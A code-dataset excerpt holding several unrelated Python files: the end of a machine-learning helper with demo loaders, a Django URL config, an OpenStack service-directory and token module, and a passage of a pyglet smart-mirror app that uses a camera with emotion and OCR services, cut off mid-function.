if graph:\n fig, ax = plt.subplots(figsize=(size, 0.5 * size))\n plt.title('Cluster Segmentation')\n plt.scatter(X[:, xy[0]], X[:, xy[1]], c=y_pred, s=50, cmap='viridis')\n self.graphs_model.append(fig)\n plt.show()\n return 'Silhouette: ' + str(round(score, 2))\n\n\n\n\n\n# Rubia Models demo cases\n\ndef selectDemo(id):\n if id == 0:\n data, meta = scipy.io.arff.loadarff('dataset/scene_arff.arff')\n df = pd.DataFrame(data)\n y_cols = ['Beach']\n #y_cols = ['Beach', 'Sunset', 'FallFoliage', 'Field', 'Mountain', 'Urban']\n ignore_cols = ['Sunset', 'FallFoliage', 'Field', 'Mountain', 'Urban']\n elif id == 1:\n df = pd.read_csv('dataset/Advertising.csv', index_col=0)\n y_cols = ['sales']\n ignore_cols = []\n elif id == 2:\n df = pd.read_csv('dataset/SAheart.csv')\n y_cols = ['chd']\n ignore_cols = []\n elif id == 3:\n df = pd.read_csv('dataset/pima-indians-diabetes.csv')\n y_cols = ['Class']\n ignore_cols = []\n elif id == 4:\n df = pd.read_excel('dataset/sample.xlsx')\n y_cols = ['g1']\n ignore_cols = ['g2', 'y', 'yr'] \n elif id == 5:\n df = pd.read_excel('dataset/sample.xlsx')\n y_cols = ['yr']\n ignore_cols = ['g1', 'g2', 'y'] \n elif id == 6:\n df = pd.read_csv('dataset/iris.csv')\n y_cols = []\n ignore_cols = ['species'] \n elif id == 7:\n df = pd.read_csv('../../../bigdata/jet/full_data.csv')\n y_cols = ['class']\n ignore_cols = ['class'] \n else:\n df = pd.read_csv('dataset/iris.csv')\n y_cols = ['species']\n ignore_cols = []\n return df, y_cols, ignore_cols\n\nrun_demo = False\nid = -1\ngraph = False\nbalance_tol = 0.3\norder = 1\nncomponents = 2\nxy = (0, 1)\nfixed = {'k': 3}\nif run_demo:\n # load data as a pandas.dataframe object and pass it to the class\n df, y_cols, ignore_cols = selectDemo(id)\n\n # load the class rubia_models and show important info about the dataset\n # flag debug mode to True to show warning messages\n rm = rubia_models(df, debug=False)\n rm.describe(rm.data_raw)\n\n # columns listed as ignored will be discarded while modeling\n # flag graph to true to show some exploratory and correlation graphs on the dataset\n rm.explore(rm.data_raw, y_cols, ignore_cols, graph=graph) #updates X, y, M\n\n # encode every column of type object or string to categorical numbers\n rm.encode(encoder='LabelEncoder')\n\n # this method makes an auto balance for each class, using the minority class\n # only applies if the dataset size variation is under tolerance value\n rm.balance(balance_tol, rm.M, y_cols, ignore_cols)\n\n # add higher level and interaction terms to the model\n # be carefull when using higher level terms and graphs together, less powerfull hardware can bottleneck with higher complexity\n rm.addTerms(rm.X, rm.y, levels=order, interaction=False, root=False)\n rm.explore(rm.M, y_cols, ignore_cols, graph=graph) #updates X, y, M\n\n # analyse if this is a regression, classification or clustering problem and evaluate some models\n # when y is float or has more then 10 different classes, the algorithm turns into a regression algorithm automatically\n # else it will perform a classification modeling\n # in multilevel problems, if one of the ys is identified as regression, then the entire process is set to regression mode\n # this routine also drops any column of constant value, if it exists\n rm.analyse(y_cols)\n\n # dimensionality reduction\n if ncomponents > 1: \n rm.redux(k=ncomponents, mode='pca', transform='MinMax')\n print('Explained variance (%)', rm.scalerX_pca.explained_variance_ratio_.sum())\n elif len(rm.X.columns) > 10: \n rm.redux(k=10)\n\n # evaluate the performance of a mix of models\n alphas = 10 ** np.linspace(10, -2, 100) * 0.5\n rm.evaluate(test_size=0.3, transformX='Standard', transformY='None', folds=10, alphas=alphas, graph=graph)\n\n # apply tuning to the best models\n rm.optimize(str(rm.report_performance.Model.iloc[0]), graph=graph, xy=xy, fixed=fixed)\n\n\n\n\n\n# To get all coefficients for a given model:\n# lassor.coef_, lassocvr.coef_, rr.coef_, rcvr.coef_\n# rfc.feature_importances_\n# logit.classes_, coef_, intercept_, n_iter_\n# nbc.class_count_, class_prior_, classes_, sigma_, theta_\n# ldac.explained_variance_ratio_\n\n\n\n# TO DO\n\n# implement multioutput (not planned)\n# adjust redux(k='auto') to calculate the optimal value for k (not planned)\n# add help menu with highlights for each model type, pros and cons (not planned)\n# weight CV and model constraints while choosing the best model type, for similar performances (not planned)\n# add metric parameter to the boost method, spefically for clustering (not planned)\n\n","sub_path":"Módulo 2 - Data Analysis/Curso 6 - Agrupamento/rubia_models.py","file_name":"rubia_models.py","file_ext":"py","file_size_in_byte":50366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"341812703","text":"from django.conf.urls import url\nfrom report import views\n\nurlpatterns = [\n # url(r'^xadmin/', site.urls),\n url(r'^index/', views.index),\n url(r'^search/', views.search),\n url(r'^sucai/', views.sucai),\n url(r'^collection/', views.collection),\n url(r'^mould/', views.mould),\n url(r'^edit/', views.sucai_edit),\n url(r'^delete/', views.delete),\n url(r'^lot_delete/', views.lot_delete),\n url(r'^del_all/', views.del_all),\n url(r'^append/', views.append),\n url(r'^collection_delete/', views.collection_delete),\n url(r'^lot_append/', views.lot_append),\n url(r'^cmould/', views.cmould),\n url(r'^create_report/', views.create_report),\n url(r'^rep_detail/', views.rep_detail),\n url(r'^del_rep/', views.del_rep),\n]\n","sub_path":"report/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"616523792","text":"#\n# Copyright (c) 2015-2018 Wind River Systems, Inc.\n#\n# SPDX-License-Identifier: Apache-2.0\n#\nimport datetime\nimport iso8601\nimport re\nimport six\n\nfrom nfv_common import debug\nfrom nfv_common.helpers import Constant\nfrom nfv_common.helpers import Constants\nfrom nfv_common.helpers import Singleton\n\nDLOG = debug.debug_get_logger('nfv_plugins.nfvi_plugins.openstack.objects')\n\n\n@six.add_metaclass(Singleton)\nclass ServiceCategory(Constants):\n \"\"\"\n Service Category Constants\n \"\"\"\n PLATFORM = Constant('platform')\n OPENSTACK = Constant('openstack')\n\n\n# Service Category Constant\nSERVICE_CATEGORY = ServiceCategory()\n\n\n@six.add_metaclass(Singleton)\nclass PlatformServices(Constants):\n \"\"\"\n Platform Services Constants\n \"\"\"\n GUEST = Constant('guest')\n KEYSTONE = Constant('keystone')\n MTC = Constant('mtc')\n SYSINV = Constant('sysinv')\n PATCHING = Constant('patching')\n FM = Constant('fm')\n\n\n# Platform Services Constant\nPLATFORM_SERVICE = PlatformServices()\n\n\n@six.add_metaclass(Singleton)\nclass OpenStackServices(Constants):\n \"\"\"\n OpenStack Services Constants\n \"\"\"\n CEILOMETER = Constant('ceilometer')\n CINDER = Constant('cinder')\n GLANCE = Constant('glance')\n KEYSTONE = Constant('keystone')\n NEUTRON = Constant('neutron')\n NOVA = Constant('nova')\n HEAT = Constant('heat')\n FM = Constant('fm')\n\n\n# OpenStack Services Constant\nOPENSTACK_SERVICE = OpenStackServices()\n\n\nclass Service(object):\n \"\"\"\n Service\n \"\"\"\n def __init__(self, region_name, service_name, service_type,\n endpoint_type, endpoint_override):\n self._region_name = region_name\n self._service_name = service_name\n self._service_type = service_type\n self._endpoint_type = endpoint_type\n self._endpoint_override = endpoint_override\n\n @property\n def region_name(self):\n \"\"\"\n Returns the region name associated with this entry\n \"\"\"\n return self._region_name\n\n @property\n def service_name(self):\n \"\"\"\n Returns the service name associated with this entry\n \"\"\"\n return self._service_name\n\n @property\n def service_type(self):\n \"\"\"\n Returns the service type associated with this entry\n \"\"\"\n return self._service_type\n\n @property\n def endpoint_type(self):\n \"\"\"\n Returns the endpoint type associated with this entry\n \"\"\"\n return self._endpoint_type\n\n @property\n def endpoint_override(self):\n \"\"\"\n Returns the endpoint override associated with this entry\n \"\"\"\n return self._endpoint_override\n\n\nclass Directory(object):\n \"\"\"\n Directory\n \"\"\"\n def __init__(self, service_category, keyring_service, auth_protocol,\n auth_host, auth_port, auth_project,\n auth_username, auth_password, auth_user_domain_name,\n auth_project_domain_name, auth_uri=None):\n self._service_category = service_category\n self._keyring_service = keyring_service\n self._auth_protocol = auth_protocol\n self._auth_host = auth_host\n self._auth_port = auth_port\n self._auth_project = auth_project\n self._auth_username = auth_username\n self._auth_password = auth_password\n self._auth_uri = auth_uri\n self._auth_user_domain_name = auth_user_domain_name\n self._auth_project_domain_name = auth_project_domain_name\n self._entries = dict()\n\n @property\n def service_category(self):\n \"\"\"\n Returns the service category\n \"\"\"\n return self._service_category\n\n @property\n def keyring_service(self):\n \"\"\"\n Returns the keyring service\n \"\"\"\n return self._keyring_service\n\n @property\n def auth_protocol(self):\n \"\"\"\n Returns the authorization protocol\n \"\"\"\n return self._auth_protocol\n\n @property\n def auth_host(self):\n \"\"\"\n Returns the authorization host\n \"\"\"\n return self._auth_host\n\n @property\n def auth_port(self):\n \"\"\"\n Returns the authorization port\n \"\"\"\n return self._auth_port\n\n @property\n def auth_project(self):\n \"\"\"\n Returns the authorization project\n \"\"\"\n return self._auth_project\n\n @property\n def auth_username(self):\n \"\"\"\n Returns the authorization username\n \"\"\"\n return self._auth_username\n\n @property\n def auth_password(self):\n \"\"\"\n Returns the authorization password\n \"\"\"\n return self._auth_password\n\n @property\n def auth_uri(self):\n \"\"\"\n Returns the authorization uri\n \"\"\"\n return self._auth_uri\n\n @property\n def auth_user_domain_name(self):\n \"\"\"\n Returns the authorization user domain name\n \"\"\"\n return self._auth_user_domain_name\n\n @property\n def auth_project_domain_name(self):\n \"\"\"\n Returns the authorization project domain name\n \"\"\"\n return self._auth_project_domain_name\n\n def set_service_info(self, service, region_name, service_name,\n service_type, endpoint_type, endpoint_override):\n \"\"\"\n Set information for a particular service\n \"\"\"\n if self._entries.get(service, None) is not None:\n del self._entries[service]\n\n entry = Service(region_name, service_name, service_type,\n endpoint_type, endpoint_override)\n self._entries[service] = entry\n\n def get_service_info(self, service):\n \"\"\"\n Get information for a particular service\n \"\"\"\n return self._entries.get(service, None)\n\n\nclass Token(object):\n \"\"\"\n Token\n \"\"\"\n def __init__(self, token_data, directory, token_id):\n self._expired = False\n self._data = token_data\n self._directory = directory\n self._token_id = token_id\n\n def set_expired(self):\n self._expired = True\n\n def is_expired(self, within_seconds=300):\n if not self._expired:\n end = iso8601.parse_date(self._data['token']['expires_at'])\n now = iso8601.parse_date(datetime.datetime.utcnow().isoformat())\n if end <= now:\n return True\n delta = abs(end - now).seconds\n return delta <= within_seconds\n return True\n\n def get_id(self):\n \"\"\"\n Get the identifier of the token.\n \"\"\"\n return self._token_id\n\n def get_tenant_id(self):\n \"\"\"\n Get the project identifier of the token.\n \"\"\"\n return self._data['token']['project']['id']\n\n def _url_strip_version(self, url):\n \"\"\"\n Strip the version information from the url\n \"\"\"\n # Get rid of the trailing '/' if present and remove the version\n # information from the URL.\n url = url.rstrip('/')\n url_bits = url.split('/')\n # Regular-Expression to match 'v1' or 'v2.0' etc\n if re.match(r'v\\d+\\.?\\d*', url_bits[-1]):\n url = '/'.join(url_bits[:-1])\n\n elif re.match(r'v\\d+\\.?\\d*', url_bits[-2]):\n url = '/'.join(url_bits[:-2])\n\n return url\n\n def _get_service_url(self, region_name, service_name, service_type,\n endpoint_type):\n \"\"\"\n Search the catalog of a service in a region for the url\n \"\"\"\n for catalog in self._data['token']['catalog']:\n if catalog['type'] == service_type:\n if catalog['name'] == service_name:\n if 0 != len(catalog['endpoints']):\n for endpoint in catalog['endpoints']:\n if (endpoint['region'] == region_name and\n endpoint['interface'] == endpoint_type):\n return endpoint['url']\n return None\n\n def get_service_url(self, service, strip_version=False):\n \"\"\"\n Get the service url for a service\n \"\"\"\n service_info = self._directory.get_service_info(service)\n if service_info is not None:\n\n region_name = service_info.region_name\n service_name = service_info.service_name\n service_type = service_info.service_type\n endpoint_type = service_info.endpoint_type\n\n endpoint = self._get_service_url(region_name, service_name,\n service_type, endpoint_type)\n\n if service_info.endpoint_override is not None:\n if endpoint is None:\n endpoint = service_info.endpoint_override\n else:\n from six.moves import urllib\n # this is necessary to keep tenant_id in place\n endpoint = \\\n service_info.endpoint_override + urllib.parse.urlparse(endpoint).path\n\n if strip_version:\n endpoint = self._url_strip_version(endpoint)\n return endpoint\n\n return None\n","sub_path":"nfv/nfv-plugins/nfv_plugins/nfvi_plugins/openstack/objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":9109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"310366152","text":"# -*- coding: utf-8 -*-\n\nimport cv2\nimport load\nimport os\nimport pyglet\nimport resources\nimport threading\nimport time\nfrom pyglet.window import key\n\nimport MScognitiveService\nimport KcognitiveService\nimport datetimeService\nimport distanceService\nimport imageCap\nimport OCRService\nimport recomendationService\nimport weatherService\n\n\n# emotion_service = {'kairos', 'ms'}\nemotion_service = 'ms'\nshow_logs = True\nshow_qr = True\ndev_recomendations = True\n\nscale = 0.38 # Dejar en 1 para fullscreen, 0.38 para heigth completo en 1366x768\nshow_FPS = True\n\nmodo_prod = False\n# Detección automática de entorno productivo\nif os.path.exists(\"../../espejo_prod\"):\n modo_prod = True\n scale = 1\n \n show_logs = False\n show_qr = True\n dev_recomendations = False\n\n###############################################################################\n# Window\nif scale >= 1:\n show_FPS = False\n scale = 1 # quitar si se permitirá scale > 1?\n \n screens = pyglet.window.get_platform().get_default_display().get_screens()\n if len(screens) > 1: # si tiene varias pantallas, usar la 2a\n window1 = pyglet.window.Window(screen=screens[1], fullscreen = True)\n else:\n window1 = pyglet.window.Window(fullscreen = True)\n # ocultar puntero en fullscreen\n window1.set_exclusive_mouse()\nelse:\n _width = int(1080*scale)\n _height = int(1920*scale) \n _style = pyglet.window.Window.WINDOW_STYLE_BORDERLESS\n \n window1 = pyglet.window.Window(width = _width,\n height = _height,\n style = _style,\n vsync = False)\n window1.set_location(0, 0) \n \"\"\"\n window2 = pyglet.window.Window(width = _width,\n height = int(_height),\n vsync = False,\n style = _style)\n window2.set_location(window1.width, 0)\n \"\"\"\nfps1 = pyglet.window.FPSDisplay(window1)\n\n###############################################################################\n# Scale & coordinates\n# window1.width and window1.height include scale\ndef get_coord_x(x):\n return int(x*scale)\ndef get_coord_y(y):\n return int(window1.height - y*scale)\ndef get_coord(x, y):\n return get_coord_x(x), get_coord_y(y)\n\ndef get_scale(sprite, width):\n return scale * (width / sprite.image.width)\n\n###############################################################################\n# textos e iconos para mostrar\ntexts = []\nicons = []\n\nfont_name = 'Segoe UI'\nif not pyglet.font.have_font('Segoe UI'):\n pyglet.font.add_file('segoeui.ttf')\n segoe_ui = pyglet.font.load('Segoe UI')\n\n###############################################################################\n# Camera\ncapDevice = imageCap.initCapture(0)\nmirror = False\nshow_camera = False\n\n\n###############################################################################\n# Color/Opacity\nhas_people = False\npeople_timestamp = 0\nno_people_timestamp = time.time()\nopacity = 0\n#color = '#000000'\n\ndef get_color(opacity):\n color = str('%X' % opacity)\n if len(color) < 2:\n color = '0' + color\n return '#' + color*3\n\n###############################################################################\n# Sprites\ncurrentEmoji = resources.no_people\npractiaEmoji = resources.practia\n#Define un batch gráfico, para acelerar el dibujo en pantalla\nemojiBatch = pyglet.graphics.Batch()\nemojis = load.emojiGroup(num_emojis = 20,\n min_x = 0,\n min_y = get_coord_y(1920),\n max_x = get_coord_x(540),\n max_y = get_coord_y(-150),\n width = 150,\n scale = scale,\n Batch = emojiBatch)\n\nappearance_batch = pyglet.graphics.Batch()\ncurrent_glasses = True\ncurrent_gender = 'Male'\ncurrent_age = ''\n\nset_kairos = True\nshow_glasses = not modo_prod\nshow_gender = not modo_prod\nshow_age = not modo_prod\n\nwidget_gender = pyglet.sprite.Sprite(img = resources.none,\n x = get_coord_x(900),\n y = get_coord_y(760),\n batch = appearance_batch)\nwidget_gender.scale = get_scale(widget_gender, 150)\nwidget_gender.opacity = opacity\n\nwidget_age = pyglet.sprite.Sprite(img = resources.age_none,\n x = get_coord_x(750),\n y = get_coord_y(850),\n batch = appearance_batch)\nwidget_age.scale = get_scale(widget_age, 300)\nwidget_age.opacity = opacity\n\n###############################################################################\n# marca\nmarca_min_y = get_coord_y(100)\nmarca_max_y = get_coord_y(1820)\nmarca_up = True\nmarca_velocity = 10\nwidget = pyglet.sprite.Sprite(resources.marca,\n x = get_coord_x(240),\n y = marca_max_y)\nwidget.scale = get_scale(widget, 600)\nwidget.opacity = 255 - opacity\nmarca_min_y -= widget.height\nmarca_timestamp = time.time()\n\n###############################################################################\n# QR\nqr_min_y = get_coord_y(1200)\nqr_max_y = get_coord_y(1500)\nqr_up = True\nqr_velocity = 10\nqr_resource = resources.qr_prod if modo_prod else resources.qr\nwidget_qr = pyglet.sprite.Sprite(qr_resource,\n x = get_coord_x(750),\n y = qr_max_y)\nwidget_qr.scale = get_scale(widget_qr, 300)\nwidget_qr.opacity = 255\nqr_min_y -= widget_qr.height\nqr_timestamp = time.time()\n\n###############################################################################\n# Datetime\nbatchClock = pyglet.graphics.Batch()\nwidgetClock = pyglet.sprite.Sprite(resources.roundhud,\n x = get_coord_x(864),\n y = get_coord_y(1910),\n batch = batchClock)\nwidgetClock.scale = get_scale(widgetClock, 200)\nwidgetClock.opacity = opacity\nicons.append(widgetClock)\n\ntextHour = pyglet.text.HTMLLabel(\n text = '',\n x = get_coord_x(969),\n y = get_coord_y(1765),\n anchor_x = 'center',\n anchor_y = 'top',\n batch = batchClock)\ntextHour.font_size = 36*scale\ntextHour.font_name = font_name\ntexts.append(textHour)\n\ntextDate = pyglet.text.HTMLLabel(\n text = '',\n x = get_coord_x(968),\n y = get_coord_y(1830),\n anchor_x = 'center',\n anchor_y = 'top',\n batch = batchClock)\ntextDate.font_size = 12*scale\ntextDate.font_name = font_name\ntexts.append(textDate)\n\n###############################################################################\n# Weather\ntextWeather = ''\nweather_icon = 0\nshow_weather = False\n\ndef get_weather_image():\n # usar en Thread principal\n file_icon = resources.weatherIcon(weather_icon)\n return pyglet.resource.image(file_icon)\n\nbatchWeather = pyglet.graphics.Batch()\nwidgetWeather = pyglet.sprite.Sprite(resources.roundhud,\n x = get_coord_x(648),\n y = get_coord_y(1910),\n batch = batchWeather)\nwidgetWeather.scale = get_scale(widgetWeather, 200)\nwidgetWeather.opacity = opacity\n#icons.append(widgetWeather)\n\ntextWeather = pyglet.text.HTMLLabel(\n text = '°C', \n x = get_coord_x(756), \n y = get_coord_y(1840), \n anchor_x = 'center',\n anchor_y = 'top',\n batch = batchWeather)\ntextWeather.font_size = 24*scale\ntextWeather.font_name = font_name\n#texts.append(textWeather)\n\niconWeather = pyglet.sprite.Sprite(img = get_weather_image(),\n x = get_coord_x(715),\n y = get_coord_y(1830),\n batch = batchWeather)\niconWeather.scale = get_scale(iconWeather, 80)\niconWeather.opacity = opacity\n#icons.append(iconWeather)\n\n###############################################################################\n# Text\nnombre_ocr = ['']\nchange_ocr = False\nshow_recomendation = False\n\nbatchTextBlock = pyglet.graphics.Batch()\nbackground = pyglet.graphics.OrderedGroup(0)\nforeground = pyglet.graphics.OrderedGroup(1)\n\nblock_text_img = resources.cuadro_rojo\nblock_text_w = 490\nblock_text_h = int(block_text_w * block_text_img.height / block_text_img.width)\nblock_text_y = 20\nblock_text = [580, block_text_h + block_text_y, block_text_w]\ncuadro_rojo = pyglet.sprite.Sprite(block_text_img,\n x = get_coord_x(block_text[0]),\n y = get_coord_y(block_text[1]),\n batch = batchTextBlock,\n group = background)\ncuadro_rojo.scale = get_scale(cuadro_rojo, block_text[2])\ncuadro_rojo.opacity = opacity\nicons.append(cuadro_rojo)\n\ntextBlock = pyglet.text.HTMLLabel(\n text = '',\n x = get_coord_x(block_text[0] + 20), \n y = get_coord_y(block_text_y + 20),\n width = get_coord_x(block_text[2] - 20),\n anchor_x = 'left',\n anchor_y = 'top',\n multiline = True,\n batch = batchTextBlock,\n group = foreground)\ntextBlock.font_size = 18*scale\ntextBlock.font_name = font_name\ntexts.append(textBlock)\n\n\n###############################################################################\n# Distances\norigen = '-33.42343,-70.61486'\ndestino = '-33.432462,-70.6253821'\nmodo = 'driving|walking|bicycling'\nshow_distances = False\n\nbatch_distances = pyglet.graphics.Batch()\n\nblock_driving = [10, 1900, 100] # [pos_x, pos_y, size_img]\nshow_driving = False\ntexto_driving = ''\nicon_driving = pyglet.sprite.Sprite(img = resources.driving,\n x = get_coord_x(block_driving[0]),\n y = get_coord_y(block_driving[1]),\n batch = batch_distances)\nicon_driving.scale = get_scale(icon_driving, block_driving[2])\nicon_driving.opacity = opacity\n\ntext_driving = pyglet.text.HTMLLabel(\n text = '',\n x = get_coord_x(block_driving[0] + block_driving[2]),\n y = get_coord_y(block_driving[1] - block_driving[2]*0.8),\n width = get_coord_x(block_driving[2]),\n anchor_x = 'left',\n anchor_y = 'top',\n multiline = True,\n batch = batch_distances)\ntext_driving.font_size = 18*scale\ntext_driving.font_name = font_name\n\nblock_walking = [190, 1890, 85] # [pos_x, pos_y, size_img]\nshow_walking = False\ntexto_walking = ''\nicon_walking = pyglet.sprite.Sprite(img = resources.walking,\n x = get_coord_x(block_walking[0]),\n y = get_coord_y(block_walking[1]),\n batch = batch_distances)\nicon_walking.scale = get_scale(icon_walking, block_walking[2])\nicon_walking.opacity = opacity\n\ntext_walking = pyglet.text.HTMLLabel(\n text = '',\n x = get_coord_x(block_walking[0] + block_walking[2]),\n y = get_coord_y(block_walking[1] - block_walking[2]*0.82),\n width = get_coord_x(block_walking[2]),\n anchor_x = 'left',\n anchor_y = 'top',\n multiline = True,\n batch = batch_distances)\ntext_walking.font_size = 18*scale\ntext_walking.font_name = font_name\n\nblock_bicycling = [370, 1900, 100] # [pos_x, pos_y, size_img]\nshow_bicycling = False\ntexto_bicycling = ''\nicon_bicycling = pyglet.sprite.Sprite(img = resources.bicycling,\n x = get_coord_x(block_bicycling[0]),\n y = get_coord_y(block_bicycling[1]),\n batch = batch_distances)\nicon_bicycling.scale = get_scale(icon_bicycling, block_bicycling[2])\nicon_bicycling.opacity = opacity\n\ntext_bicycling = pyglet.text.HTMLLabel(\n text = '',\n x = get_coord_x(block_bicycling[0] + block_bicycling[2]),\n y = get_coord_y(block_bicycling[1] - block_bicycling[2]*0.8),\n width = get_coord_x(block_bicycling[2]),\n anchor_x = 'left',\n anchor_y = 'top',\n multiline = True,\n batch = batch_distances)\ntext_bicycling.font_size = 18*scale\ntext_bicycling.font_name = font_name\n\n###############################################################################\n# log en modo prod\ntexto_log = []\ntext_log = pyglet.text.HTMLLabel(\n text = '',\n x = get_coord_x(0),\n y = get_coord_y(1700),\n width = get_coord_x(540),\n anchor_x = 'left',\n anchor_y = 'top',\n multiline = True,\n batch = batch_distances)\ntext_log.font_size = 14*scale\ntext_log.font_name = font_name\nif show_logs:\n texts.append(text_log)\n\ntexto_log_ocr = ['OCR']\ntext_log_ocr = pyglet.text.HTMLLabel(\n text = '',\n x = get_coord_x(0),\n y = get_coord_y(1500),\n width = get_coord_x(540),\n anchor_x = 'left',\n anchor_y = 'top',\n multiline = True,\n batch = batch_distances)\ntext_log_ocr.font_size = 14*scale\ntext_log_ocr.font_name = font_name\nif show_logs:\n texts.append(text_log_ocr)\n\n###############################################################################\n###############################################################################\n# window events\n@window1.event\ndef on_close():\n imageCap.endCapture(capDevice)\n \n@window1.event\ndef on_draw():\n window1.clear()\n\n if has_people:\n if show_recomendation:\n batchTextBlock.draw()\n \n if show_qr:\n widget_qr.draw()\n batchClock.draw()\n batchWeather.draw()\n batch_distances.draw()\n emojiBatch.draw() # Dibuja todos los emojis a la vez\n \n appearance_batch.draw()\n else:\n widget.draw()\n \n if show_FPS:\n fps1.draw()\n\n@window1.event\ndef on_key_press(symbol, modifiers):\n global mirror\n global show_camera\n \n if symbol == key.C:\n show_camera = not show_camera\n if show_camera:\n cv2.namedWindow('camara', flags = cv2.WINDOW_NORMAL)\n else:\n cv2.destroyAllWindows()\n elif symbol == key.M:\n mirror = not mirror\n\n\n###############################################################################\n###############################################################################\ndef set_datetime():\n datetime = datetimeService.getDatetime()\n \n textHour.text = datetime[1]\n textHour.color = (255, 255, 255, opacity)\n textHour.font_size = 36*scale\n textHour.font_name = font_name\n \n textDate.text = datetime[2]\n textDate.color = (255, 255, 255, opacity)\n textDate.font_size = 12*scale\n textDate.font_name = font_name\n \n return\n \ndef set_weather():\n global weather_text, weather_icon, show_weather\n global _icon\n \n weather = weatherService.getPrediction(datetimeService.getDatetime()[0], not modo_prod)\n \n show_weather = not weather['error']\n if weather['error']:\n add_text_log('Weather ERROR:', weather['errorMessage'])\n else:\n weather_text = weather['temperatureText'] \n weather_icon = weather['icon']\n add_text_log('Weather:', weather_text)\n \n return\n\ndef set_text_block(texto):\n textBlock.text = texto\n textBlock.color = (255, 255, 255, opacity)\n textBlock.font_size = 24*scale\n textBlock.font_name = font_name\n \n return\n\ndef draw_text_blocks_s(dt):\n draw_text_blocks()\n \ndef draw_text_blocks():\n global show_recomendation\n \n _nombre = ' ' + nombre_ocr[0] if len(nombre_ocr[0]) > 0 else ''\n next_recomendation = recomendationService.get_next_recomendation(dev_recomendations)\n \n show_recomendation = next_recomendation[0]\n \n if next_recomendation[0]:\n add_text_log('Próxima actividad', next_recomendation[1]['actividad'])\n recomendacion = next_recomendation[1]['text'].replace('__nombre__', _nombre)\n set_text_block(recomendacion)\n else:\n set_text_block('')\n \n return\n\ndef set_text_distance(sprite, label, texto, show = True):\n op = opacity if show else 0\n \n if show:\n label.text = texto\n label.font_size = 18*scale\n label.font_name = font_name\n \n label.color = (255, 255, 255, op) \n sprite.opacity = op\n \n return\n\ndef set_text_distance_t():\n d = threading.Thread(target = set_text_distances, name = 'set_text_distances')\n d.setDaemon(True)\n d.start()\n return\n\ndef set_text_distances():\n global show_driving, show_walking, show_bicycling\n global texto_driving, texto_walking, texto_bicycling\n global show_distances\n \n distances = distanceService.get_distance(origen,destino,modo,False) \n\n for mode in distances:\n m = mode['mode']\n d = mode['data']\n show = True if d['status'] == 'OK' else False\n text = ''.join((d['distance'], '
', d['duration']))\n\n if m == 'driving':\n show_driving = show\n texto_driving = text\n elif m == 'walking':\n show_walking = show\n texto_walking = text\n elif m == 'bicycling':\n show_bicycling = show\n texto_bicycling = text\n \n # descomentar para mostrar distancias\n #show_distances = True\n \n return\n\ndef changeState(state):\n global currentEmoji\n global no_people_timestamp\n global people_timestamp\n global show_glasses, show_gender, show_age, set_kairos\n \n # marcar el primer cambio entre detectar persona o no\n if state == 'no_people':\n show_glasses = False\n show_gender = False\n show_age = False\n set_kairos = True\n \n if currentEmoji != resources.no_people:\n no_people_timestamp = time.time()\n else:\n if currentEmoji == resources.no_people:\n people_timestamp = time.time() \n \n if state == '' or state == 'neutro' or state == 'neutral':\n currentEmoji=resources.neutro\n elif state == 'no_people':\n currentEmoji=resources.no_people\n elif state == 'angry' or state == 'anger':\n currentEmoji=resources.angry\n elif state == 'disgust' or state == 'contempt':\n currentEmoji=resources.disgust\n elif state == 'fear':\n currentEmoji=resources.fear\n elif state == 'joy' or state == 'happiness':\n currentEmoji=resources.joy\n elif state == 'sadness':\n currentEmoji=resources.sadness\n elif state == 'surprise':\n currentEmoji=resources.surprise\n #print('change to ' + state) \n return\n\ndef get_image():\n global currentEmoji\n global set_kairos\n \n while True:\n newfile = imageCap.captureImage(capDevice,\n _mirror = mirror,\n _show_camera = show_camera,\n kairos = set_kairos)\n if '.png' in str(newfile[0]) or '.jpg' in str(newfile[0]):\n #changeState('')\n #print('capture image')\n d = threading.Thread(target = getEmociones,\n name = 'getEmociones',\n kwargs = {'filename': newfile[0]})\n d.setDaemon(True)\n d.start()\n elif 'joy' in str(newfile[0]):\n changeState('joy')\n elif 'no_people' in str(newfile[0]):\n changeState('no_people')\n elif 'neutro' in str(newfile[0]) and currentEmoji == resources.no_people:\n # cambia a neutro cuando encuentre a una persona \"nueva\"\n changeState('neutro')\n \n \"\"\"\n if '.png' in str(newfile[1]) or '.jpg' in str(newfile[1]):\n d = threading.Thread(target = get_OCR,\n name = 'get_OCR',\n kwargs = {'filename': newfile[1]})\n d.setDaemon(True)\n d.start()\n \"\"\"\n \n if '.png' in str(newfile[2]) or '.jpg' in str(newfile[2]):\n d = threading.Thread(target = get_Kairos,\n name = 'get_Kairos',\n kwargs = {'filename': newfile[2]})\n d.setDaemon(True)\n d.start()\n return\n\ndef getEmociones(filename):\n global emotion_service\n \n if 'ms' in emotion_service:\n emotion = MScognitiveService.get_emotions(filename)\n add_text_log('Emocion:', emotion[2])\n if emotion[0] != '': \n changeState(emotion[0])\n elif 'kairos' in emotion_service:\n emotions = cognitiveService.get_emotions(filename) \n if not emotions['error']:\n emotion = cognitiveService.get_emotion(emotions['emotions'])\n add_text_log('Emocion:', emotion[2])\n if emotion[0] != '': \n changeState(emotion[0])\n return\n\n'''\ndef getKairosData(filename):\n kairosData = KcognitiveService.get_emotions(filename)\n add_text_log('Emocion:', emotion[2])\n if emotion[0] != '': \n changeState(emotion[0])\n return\n'''\n\ndef get_OCR(filename):\n global nombre_ocr, change_ocr\n \n ocr = OCRService.get_data_ocr(filename) # estado, nombre, empresa\n if ocr[0]:\n if ocr[1] in nombre_ocr:\n #match\n print('change name:', nombre_ocr[0], '>>', ocr[1])\n print(nombre_ocr)\n add_text_log_ocr('OCR MATCH:', ocr[1])\n nombre_ocr = [ocr[1]]\n change_ocr = True\n else:\n nombre_ocr.append(ocr[1])\n print('add ocr:', ocr[1])\n add_text_log_ocr('OCR:', ocr[1])\n \n elif nombre_ocr[0] != '':\n add_text_log_ocr('OCR:', ocr[1])\n nombre_ocr = ['']\n change_ocr = True\n return\n\ndef get_Kairos(filename):\n global show_glasses, show_gender, show_age\n global current_glasses, current_gender, current_age\n global set_kairos\n global emotion_service\n \n appearance = cognitiveService.get_appearance(filename)\n \n set_kairos = appearance['error']\n show_glasses = not appearance['error']\n show_gender = not appearance['error']\n show_age = not appearance['error']\n \n if not appearance['error']:\n 